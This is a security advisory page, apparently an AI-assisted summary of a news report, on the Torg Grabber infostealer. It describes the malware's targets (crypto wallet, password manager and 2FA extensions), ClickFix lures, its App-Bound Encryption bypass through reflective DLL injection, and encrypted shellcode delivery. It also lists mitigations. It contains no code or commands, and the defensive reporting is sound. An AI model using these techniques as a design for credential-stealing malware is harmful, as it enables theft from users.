top of page
perceptive_background_267k.jpg

New Torg Grabber infostealer malware targets 728 crypto wallets

Published:

25 March 2026 at 18:32:37

Alert date:

25 March 2026 at 19:06:05

Source:

bleepingcomputer.com

Click to open the original link from this advisory

Ransomware & Malware, Web Technologies, Data Breach & Exfiltration

A new information-stealing malware called Torg Grabber has emerged, targeting sensitive data from 850 browser extensions, with over 700 of them being cryptocurrency wallets. The malware specifically focuses on stealing cryptocurrency wallet credentials and sensitive financial information. This represents a significant threat to cryptocurrency users and their digital assets. The malware's extensive targeting of crypto wallets indicates a sophisticated operation designed to maximize financial theft. The threat is actively spreading and poses immediate risks to users with cryptocurrency holdings.

Technical details

Torg Grabber is an info-stealing malware that targets 850 browser extensions, with 728 being cryptocurrency wallets. It uses the ClickFix technique for initial access by hijacking clipboard and tricking users into executing malicious PowerShell commands. The malware evolved from Telegram-based to encrypted TCP protocol, then to HTTPS through Cloudflare infrastructure on December 18, 2025. It features anti-analysis mechanisms, multi-layered obfuscation, direct syscalls, reflective loading, and runs entirely in memory. Added App-Bound Encryption bypass on December 22, 2025. Uses a standalone tool called Underground that injects DLL reflectively into browsers to access Chrome's COM Elevation Service and extract master encryption keys. Can execute shellcode delivered in ChaCha-encrypted zlib-compressed form from C2 servers.

Mitigation steps:

Monitor for ClickFix technique attempts, PowerShell command execution from clipboard hijacking, suspicious browser extension activity, connections to new C2 domains registered weekly, reflective DLL injection into browsers, and unauthorized access to Chrome's COM Elevation Service. Implement detection for the 24 documented antivirus tools that the malware attempts to identify.

Affected products:

25 Chromium-based browsers
8 Firefox variants
Chrome
Brave
Edge
Vivaldi
Opera
728 cryptocurrency wallet extensions including MetaMask
Phantom
TrustWallet
Coinbase
Binance
Exodus
TronLink
Ronin
OKX
Keplr
Rabby
Sui
Solflare
103 password manager extensions including LastPass
1Password
Bitwarden
KeePass
NordPass
Dashlane
ProtonPass
Enpass
Psono
Pleasant Password Server
heylogin
2FA tools including 2FAAuth
GAuth
TOTP Authenticator
Akamai MFA
19 note-taking apps
Discord
Telegram
Steam
VPN applications
FTP applications
Email clients
Desktop cryptocurrency wallet applications

Related links:

https://www.bleepingcomputer.com/news/security/google-chrome-adds-app-bound-encryption-to-block-infostealer-malware/
https://www.bleepingcomputer.com/news/security/infostealer-malware-bypasses-chromes-new-cookie-theft-defenses/
https://www.bleepingcomputer.com/news/security/voidstealer-malware-steals-chrome-master-key-via-debugger-trick/
https://www.gendigital.com/blog/insights/research/torg-grabber-credential-stealer-analysis

Related CVE's:

Related threat actors:

IOC's:

334 unique samples compiled between December 2025 and February 2026, New command-and-control servers registered weekly, 40 operator tags documented, HTTPS connections routed through Cloudflare infrastructure, ChaCha-encrypted zlib-compressed shellcode delivery

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page